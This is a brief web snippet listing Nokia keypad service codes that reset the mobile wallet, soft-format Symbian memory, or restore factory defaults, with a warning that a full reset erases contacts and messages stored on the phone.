*#7370925538# (*#res0wallet#) Reset the mobile wallet 
(Phone must have the mobile wallet feature)
*#7370# (*#res0#) Soft-format the memory (Symbian)
*#7780# (*#rst0#) Reset to factory defaults, confirmation required 
(also known has a Hard-format), 
all phone contents will be wiped clean including contacts and smses 
if they are stored on the phone.

Read More

Earn 25$ Instant